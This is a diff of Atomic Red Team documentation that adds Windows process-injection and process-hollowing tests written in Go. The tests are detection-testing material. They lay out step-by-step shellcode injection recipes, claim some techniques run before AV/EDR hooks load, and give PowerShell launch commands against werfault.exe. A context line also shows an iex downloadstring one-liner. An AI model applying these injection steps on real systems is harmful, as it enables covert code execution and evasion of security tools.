+- [Atomic Test #2 - EarlyBird APC Queue Injection in Go](#atomic-test-2---earlybird-apc-queue-injection-in-go)
+
+- [Atomic Test #3 - Remote Process Injection with Go using NtQueueApcThreadEx WinAPI](#atomic-test-3---remote-process-injection-with-go-using-ntqueueapcthreadex-winapi)
+
 
 <br/>
 
@@ -66,4 +70,97 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #2 - EarlyBird APC Queue Injection in Go
+Creates a process in a suspended state and calls QueueUserAPC WinAPI to add a UserAPC to the child process that points to allocated shellcode. 
+ResumeThread is called which then calls NtTestAlert to execute the created UserAPC which then executes the shellcode.
+This technique allows for the early execution of shellcode and potentially before AV/EDR can hook functions to support detection.
+- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createprocesswithpipe)
+- References: 
+  - https://www.bleepingcomputer.com/news/security/early-bird-code-injection-technique-helps-malware-stay-undetected/
+  - https://www.ired.team/offensive-security/code-injection-process-injection/early-bird-apc-queue-code-injection
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 73785dd2-323b-4205-ab16-bb6f06677e14
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| spawn_process_path | Path of the binary to spawn | string | C:&#92;Windows&#92;System32&#92;werfault.exe|
+| spawn_process_name | Name of the process to spawn | string | werfault|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$PathToAtomicsFolder\T1055.004\bin\x64\EarlyBird.exe -program "#{spawn_process_path}" -debug
+```
+
+#### Cleanup Commands:
+```powershell
+Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+Stop-Process -Name "#{spawn_process_name}" -ErrorAction SilentlyContinue
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #3 - Remote Process Injection with Go using NtQueueApcThreadEx WinAPI
+Uses the undocumented NtQueueAPCThreadEx WinAPI to create a "Special User APC" in the current thread of the current process to execute shellcode. 
+Since the shellcode is loaded and executed in the current process it is considered local shellcode execution.
+
+Steps taken with this technique
+1. Allocate memory for the shellcode with VirtualAlloc setting the page permissions to Read/Write
+2. Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space
+3. Change the memory page permissions to Execute/Read with VirtualProtect
+4. Get a handle to the current thread
+5. Execute the shellcode in the current thread by creating a Special User APC through the NtQueueApcThreadEx function
+
+- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode/tree/master#rtlcreateuserthread)
+- References:
+  - https://repnz.github.io/posts/apc/user-apc/
+  - https://docs.rs/ntapi/0.3.1/ntapi/ntpsapi/fn.NtQueueApcThreadEx.html
+  - https://0x00sec.org/t/process-injection-apc-injection/24608
+  - https://twitter.com/aionescu/status/992264290924032005
+  - http://www.opening-windows.com/techart_windows_vista_apc_internals2.htm#_Toc229652505
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 4cc571b1-f450-414a-850f-879baf36aa06
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$PathToAtomicsFolder\T1055.004\bin\x64\NtQueueApcThreadEx.exe -debug
+```
+
+#### Cleanup Commands:
+```powershell
+Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+```
+
+
+
+
+
 <br/>

atomics/T1055.012/T1055.012.md

@@ -12,6 +12,10 @@ This is very similar to [Thread Local Storage](https://attack.mitre.org/techniqu
 
 - [Atomic Test #2 - RunPE via VBA](#atomic-test-2---runpe-via-vba)
 
+- [Atomic Test #3 - Process Hollowing in Go using CreateProcessW WinAPI](#atomic-test-3---process-hollowing-in-go-using-createprocessw-winapi)
+
+- [Atomic Test #4 - Process Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012)](#atomic-test-4---process-hollowing-in-go-using-createprocessw-and-createpipe-winapis-t1055012)
+
 
 <br/>
 
@@ -107,4 +111,86 @@ Write-Host "You will need to install Microsoft #{ms_product} manually to meet th
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #3 - Process Hollowing in Go using CreateProcessW WinAPI
+Creates a process in a suspended state, executes shellcode to spawn calc.exe in a child process, and then resumes the original process.
+- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createprocess)
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** c8f98fe1-c89b-4c49-a7e3-d60ee4bc2f5a
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| hollow_binary_path | Path of the binary to hollow | string | C:&#92;Windows&#92;System32&#92;werfault.exe|
+| hollow_process_name | Name of the process to hollow | string | werfault|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$PathToAtomicsFolder\T1055.012\bin\x64\CreateProcess.exe -program "#{hollow_binary_path}" -debug
+```
+
+#### Cleanup Commands:
+```powershell
+Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+Stop-Process -Name "#{hollow_process_name}" -ErrorAction SilentlyContinue
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #4 - Process Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012)
+Create a process in a suspended state, execute shellcode to spawn calc.exe in a child process, and then resume the original process.
+This test uses the CreatePipe function to create an anonymous pipe that parent and child processes can communicate over. This anonymous pipe
+allows for the retrieval of output generated from executed shellcode.
+- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createprocesswithpipe)
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 94903cc5-d462-498a-b919-b1e5ab155fee
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| hollow_binary_path | Path of the binary to hollow | string | C:&#92;Windows&#92;System32&#92;werfault.exe|
+| hollow_process_name | Name of the process to hollow | string | werfault|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$PathToAtomicsFolder\T1055.012\bin\x64\CreateProcessWithPipe.exe -program "#{hollow_binary_path}" -debug
+```
+
+#### Cleanup Commands:
+```powershell
+Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+Stop-Process -Name "#{hollow_process_name}" -ErrorAction SilentlyContinue
+```
+
+
+
+
+
 <br/>

atomics/T1055/T1055.md

@@ -18,6 +18,20 @@ More sophisticated samples may perform multiple process injections to segment mo
 
 - [Atomic Test #5 - Read-Write-Execute process Injection](#atomic-test-5---read-write-execute-process-injection)
 
+- [Atomic Test #6 - Process Injection with Go using UuidFromStringA WinAPI](#atomic-test-6---process-injection-with-go-using-uuidfromstringa-winapi)
+
+- [Atomic Test #7 - Process Injection with Go using EtwpCreateEtwThread WinAPI](#atomic-test-7---process-injection-with-go-using-etwpcreateetwthread-winapi)
+
+- [Atomic Test #8 - Remote Process Injection with Go using RtlCreateUserThread WinAPI](#atomic-test-8---remote-process-injection-with-go-using-rtlcreateuserthread-winapi)
+
+- [Atomic Test #9 - Remote Process Injection with Go using CreateRemoteThread WinAPI](#atomic-test-9---remote-process-injection-with-go-using-createremotethread-winapi)
+
+- [Atomic Test #10 - Remote Process Injection with Go using CreateRemoteThread WinAPI (Natively)](#atomic-test-10---remote-process-injection-with-go-using-createremotethread-winapi-natively)
+
+- [Atomic Test #11 - Process Injection with Go using CreateThread WinAPI](#atomic-test-11---process-injection-with-go-using-createthread-winapi)
+
+- [Atomic Test #12 - Process Injection with Go using CreateThread WinAPI (Natively)](#atomic-test-12---process-injection-with-go-using-createthread-winapi-natively)
+
 
 <br/>
 
@@ -287,4 +301,326 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #6 - Process Injection with Go using UuidFromStringA WinAPI
+Uses WinAPI UuidFromStringA to load shellcode to a memory address then executes the shellcode using EnumSystemLocalesA.
+With this technique, memory is allocated on the heap and does not use commonly suspicious APIs such as VirtualAlloc, WriteProcessMemory, or CreateThread 
+- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode/tree/master#uuidfromstringa)
+- References: 
+  - https://research.nccgroup.com/2021/01/23/rift-analysing-a-lazarus-shellcode-execution-method/
+  - https://twitter.com/_CPResearch_/status/1352310521752662018
+  - https://blog.securehat.co.uk/process-injection/shellcode-execution-via-enumsystemlocala
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 2315ce15-38b6-46ac-a3eb-5e21abef2545
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$PathToAtomicsFolder\T1055\bin\x64\UuidFromStringA.exe -debug
+```
+
+#### Cleanup Commands:
+```powershell
+Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #7 - Process Injection with Go using EtwpCreateEtwThread WinAPI
+Uses EtwpCreateEtwThread function from ntdll.dll to execute shellcode within the application's process.
+This program loads the DLLs and gets a handle to the used procedures itself instead of using the windows package directly.
+
+Steps taken with this technique
+1. Allocate memory for the shellcode with VirtualAlloc setting the page permissions to Read/Write
+2. Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space
+3. Change the memory page permissions to Execute/Read with VirtualProtect
+4. Call EtwpCreateEtwThread on shellcode address
+5. Call WaitForSingleObject so the program does not end before the shellcode is executed
+
+- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode/tree/master#EtwpCreateEtwThread)
+- References: 
+  - https://gist.github.com/TheWover/b2b2e427d3a81659942f4e8b9a978dc3
+  - https://www.geoffchappell.com/studies/windows/win32/ntdll/api/etw/index.htm
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 7362ecef-6461-402e-8716-7410e1566400
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$PathToAtomicsFolder\T1055\bin\x64\EtwpCreateEtwThread.exe -debug
+```
+
+#### Cleanup Commands:
+```powershell
+Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #8 - Remote Process Injection with Go using RtlCreateUserThread WinAPI
+Executes shellcode in a remote process.
+
+Steps taken with this technique
+1. Get a handle to the target process
+2. Allocate memory for the shellcode with VirtualAllocEx setting the page permissions to Read/Write
+3. Use the WriteProcessMemory to copy the shellcode to the allocated memory space in the remote process
+4. Change the memory page permissions to Execute/Read with VirtualProtectEx
+5. Execute the entrypoint of the shellcode in the remote process with RtlCreateUserThread
+6. Close the handle to the remote process
+
+- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode/tree/master#rtlcreateuserthread)
+- References: 
+  - https://www.cobaltstrike.com/blog/cobalt-strikes-process-injection-the-details-cobalt-strike
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** a0c1725f-abcd-40d6-baac-020f3cf94ecd
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| spawn_process_path | Path of the binary to spawn | string | C:&#92;Windows&#92;System32&#92;werfault.exe|
+| spawn_process_name | Name of the process spawned | string | werfault|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$process = Start-Process #{spawn_process_path} -passthru
+$PathToAtomicsFolder\T1055\bin\x64\RtlCreateUserThread.exe -pid $process.Id -debug
+```
+
+#### Cleanup Commands:
+```powershell
+Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+Stop-Process -Name #{spawn_process_name} -ErrorAction SilentlyContinue
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #9 - Remote Process Injection with Go using CreateRemoteThread WinAPI
+Leverages the Windows CreateRemoteThread function from Kernel32.dll to execute shellocde in a remote process.
+
+This application leverages functions from the golang.org/x/sys/windows package, where feasible, like the windows.OpenProcess().
+
+Steps taken with this technique
+1. Get a handle to the target process
+2. Allocate memory for the shellcode with VirtualAllocEx setting the page permissions to Read/Write
+3. Use the WriteProcessMemory to copy the shellcode to the allocated memory space in the remote process
+4. Change the memory page permissions to Execute/Read with VirtualProtectEx
+5. Execute the entrypoint of the shellcode in the remote process with CreateRemoteThread
+6. Close the handle to the remote process
+
+- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createremotethread)
+ - References:
+  - https://www.ired.team/offensive-security/code-injection-process-injection/process-injection
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 69534efc-d5f5-4550-89e6-12c6457b9edd
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| spawn_process_path | Path of the binary to spawn | string | C:&#92;Windows&#92;System32&#92;werfault.exe|
+| spawn_process_name | Name of the process spawned | string | werfault|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$process = Start-Process #{spawn_process_path} -passthru
+$PathToAtomicsFolder\T1055\bin\x64\CreateRemoteThread.exe -pid $process.Id -debug
+```
+
+#### Cleanup Commands:
+```powershell
+Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+Stop-Process -Name #{spawn_process_name} -ErrorAction SilentlyContinue
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #10 - Remote Process Injection with Go using CreateRemoteThread WinAPI (Natively)
+Leverages the Windows CreateRemoteThread function from Kernel32.dll to execute shellcode in a remote process.
+
+This program loads the DLLs and gets a handle to the used procedures itself instead of using the windows package directly.
+
+1. Get a handle to the target process
+2. Allocate memory for the shellcode with VirtualAllocEx setting the page permissions to Read/Write
+3. Use the WriteProcessMemory to copy the shellcode to the allocated memory space in the remote process
+4. Change the memory page permissions to Execute/Read with VirtualProtectEx
+5. Execute the entrypoint of the shellcode in the remote process with CreateRemoteThread
+6. Close the handle to the remote process
+
+- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createremotethreadnative)
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 2a4ab5c1-97ad-4d6d-b5d3-13f3a6c94e39
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| spawn_process_path | Path of the binary to spawn | string | C:&#92;Windows&#92;System32&#92;werfault.exe|
+| spawn_process_name | Name of the process spawned | string | werfault|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$process = Start-Process #{spawn_process_path} -passthru
+$PathToAtomicsFolder\T1055\bin\x64\CreateRemoteThreadNative.exe -pid $process.Id -debug
+```
+
+#### Cleanup Commands:
+```powershell
+Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+Stop-Process -Name #{spawn_process_name} -ErrorAction SilentlyContinue
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #11 - Process Injection with Go using CreateThread WinAPI
+This program executes shellcode in the current process using the following steps
+1. Allocate memory for the shellcode with VirtualAlloc setting the page permissions to Read/Write
+2. Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space
+3. Change the memory page permissions to Execute/Read with VirtualProtect
+4. Call CreateThread on shellcode address
+5. Call WaitForSingleObject so the program does not end before the shellcode is executed
+
+This program leverages the functions from golang.org/x/sys/windows to call Windows procedures instead of manually loading them
+
+- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createthread)
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 2871ed59-3837-4a52-9107-99500ebc87cb
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$PathToAtomicsFolder\T1055\bin\x64\CreateThread.exe -debug
+```
+
+#### Cleanup Commands:
+```powershell
+Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #12 - Process Injection with Go using CreateThread WinAPI (Natively)
+This program executes shellcode in the current process using the following steps
+1. Allocate memory for the shellcode with VirtualAlloc setting the page permissions to Read/Write
+2. Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space
+3. Change the memory page permissions to Execute/Read with VirtualProtect
+4. Call CreateThread on shellcode address
+5. Call WaitForSingleObject so the program does not end before the shellcode is executed
+
+This program loads the DLLs and gets a handle to the used procedures itself instead of using the windows package directly.
+
+- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createthreadnative)
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 2a3c7035-d14f-467a-af94-933e49fe6786
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$PathToAtomicsFolder\T1055\bin\x64\CreateThreadNative.exe -debug
+```
+
+#### Cleanup Commands:
+```powershell
+Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+```
+
+
+
+
+
 <br/>

atomics/T1106/T1106.md

@@ -20,6 +20,8 @@ Adversaries may use assembly to directly or in-directly invoke syscalls in an at
 
 - [Atomic Test #4 - WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique](#atomic-test-4---winpwn---get-system-shell---pop-system-shell-using-namedpipe-impersonation-technique)
 
+- [Atomic Test #5 - Run Shellcode via Syscall in Go](#atomic-test-5---run-shellcode-via-syscall-in-go)
+
 
 <br/>
 
@@ -152,4 +154,44 @@ iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #5 - Run Shellcode via Syscall in Go
+Runs shellcode in the current running process via a syscall.
+
+Steps taken with this technique
+1. Allocate memory for the shellcode with VirtualAlloc setting the page permissions to Read/Write
+2. Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space
+3. Change the memory page permissions to Execute/Read with VirtualProtect
+4. Use syscall to execute the entrypoint of the shellcode
+
+- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#syscall)
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** ae56083f-28d0-417d-84da-df4242da1f7c
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$PathToAtomicsFolder\T1106\bin\x64\syscall.exe -debug
+```
+
+#### Cleanup Commands:
+```powershell
+Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+```
+
+
+
+
+
 <br/>